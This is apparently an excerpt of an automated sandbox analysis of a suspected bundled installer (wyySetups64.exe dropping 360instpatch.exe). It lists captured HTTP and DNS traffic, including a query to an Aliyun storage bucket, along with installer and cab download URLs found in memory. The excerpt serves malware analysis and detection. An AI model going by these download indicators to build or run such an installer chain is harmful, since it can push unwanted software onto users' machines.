    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=36608336 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4187&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: gwwifha84989.oss-ap-northeast-2.aliyuncs.com
    Source: global trafficDNS traffic detected: DNS query: s.360.cn
    Source: global trafficDNS traffic detected: DNS query: st.p.360.cn
    Source: global trafficDNS traffic detected: DNS query: agt.p.360.cn
    Source: global trafficDNS traffic detected: DNS query: tr.p.360.cn
    Source: global trafficDNS traffic detected: DNS query: agd.p.360.cn
    Source: global trafficDNS traffic detected: DNS query: pinst.360.cn
    Source: 360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://%s/%s.trt
    Source: 360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://%s/%u%u.html
    Source: 360instpatch.exeString found in binary or memory: http://%s/gf/360ini.cab
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab
    Source: 360instpatch.exeString found in binary or memory: http://%s/wpad.dat
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://123.com/
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:
    Source: 360instpatch.exe, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://360.cn
    Source: 360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://agd.p.360.cn
    Source: 360instpatch.exe, 00000008.00000002.4118556728.00000000046D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://agd.p.360.cn36pData
    Source: 360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
    Source: sites.dll.8.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
    Source: wyySetups64.exe, 00000000.00000002.1810189166.0000000000821000.00000004.00000020.00020000.00000000.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
    Source: wyySetups64.exe, 00000000.00000002.1818515504.000000000325B000.00000004.00000010.00020000.00000000.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: sites.dll.8.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://crl.globalsign.net/root.crl0
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
    Source: svchost.exe, 0000000C.00000002.3462329786.000001A6AFC10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
    Source: 360instpatch.exeString found in binary or memory: http://dl.360safe.com/gf/360ini.cab
    Source: 360instpatch.exe, 00000008.00000003.1883514996.0000000008D90000.00000004.00000800.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4117987871.00000000040AA000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4116675905.000000000325F000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115560629.00000000012F6000.00000004.00000010.00020000.00000000.sdmp, setup.ini.8.drString found in binary or memory: http://dl.360safe.com/setup_13.0.0.2008k.exe
    Source: 360instpatch.exeString found in binary or memory: http://down.360safe.com/
    Source: 360instpatch.exe, 00000008.00000003.1883514996.0000000008D90000.00000004.00000800.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4117987871.00000000040AA000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115560629.00000000012F6000.00000004.00000010.00020000.00000000.sdmp, setup.ini.8.drString found in binary or memory: http://down.360safe.com/360safe/slideshow_new.cab
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://down.360safe.com/h11=
    Source: 360instpatch.exeString found in binary or memory: http://down.360safe.com/setup.exe
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, sites.dll.8.dr, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exePathSOFTWARE
    Source: 360instpatch.exe, 00000009.00000002.1799520437.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: http://down.360safe.com/setup.exehttp://d
    Source: 360instpatch.exe, 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmp, 360instpatch.exe, 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000000.1789703618.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798326066.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799520437.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799550491.0000000000BF8000.00000004.00000001.01000000.0000000A.sdmp, sites.dll.8.dr, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe
    Source: 360instpatch.exe, 00000008.00000000.1789703618.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798326066.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799550491.0000000000BF8000.00000004.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeh
    Source: 360instpatch.exeString found in binary or memory: http://down.360safe.com/setupbeta.exe
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFA88000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: edb.log.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
    Source: edb.log.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: edb.log.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFA88000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFA88000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFABD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: powershell.exe, 00000006.00000002.1779756708.0000000007A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoftM
    Source: powershell.exe, 00000006.00000002.1779756708.0000000007A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://hao.360.com
    Source: 360instpatch.exe, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
    Source: 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
    Source: wyySetups64.exe, 00000000.00000002.1810189166.0000000000821000.00000004.00000020.00020000.00000000.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
    Source: sites.dll.8.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
    Source: wyySetups64.exe, 00000000.00000002.1818515504.000000000325B000.00000004.00000010.00020000.00000000.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: 360instpatch.exeString found in binary or memory: http://p.s.360.cn/p2p/p2sp_uplog.php
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://p.s.360.cn/p2p/p2sp_uplog.php0cpsign1md5b3deb21a3401d8e933ddcb45a6c07222
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: 360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://pinst.360.cn/360haohua/safe_chaoqiang.cab?
    Source: 360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab
    Source: 360instpatch.exe, 00000008.00000002.4118275547.0000000004286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=36608336
    Source: 360instpatch.exe, 00000008.00000002.4118275547.0000000004286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=36608336//VJ8
    Source: 360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=366083369C0-6B1983C61382
    Source: 360instpatch.exe, 00000008.00000002.4118556728.00000000046D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=36608336st.c
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://pinst.360.cn/360se/wssj_setup.cab
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://pinst.360.cn/zhuomian/desktopsafe.cab
    Source: 360instpatch.exeString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp
    Source: 360instpatch.exeString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
    Source: 360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1844261692.000000000320E000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1836204024.0000000003018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefin
    Source: 360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefi
    Source: 360instpatch.exe, 00000008.00000002.4116675905.00000000031DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safef
    Source: 360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safef
    Source: 360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safef
    Source: 360instpatch.exe, 00000008.00000003.1836135018.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefi
    Source: 360instpatch.exe, 00000008.00000002.4115869359.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4116675905.00000000031CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safef
    Source: 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safef
    Source: 360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefin
    Source: 360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4116675905.00000000031CA000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1844261692.000000000321E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefi
    Source: 360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safef
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://s.symcd.com06
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://s2.symcb.com0
    Source: 360P2SP.dll.8.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: 360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774677766.0000000005960000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
    Source: wyySetups64.exe, 00000000.00000002.1810189166.0000000000821000.00000004.00000020.00020000.00000000.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
    Source: sites.dll.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
    Source: 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: sites.dll.8.drString found in binary or memory: http://sf.symcb.com/sf.crl0a
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://sf.symcb.com/sf.crt0
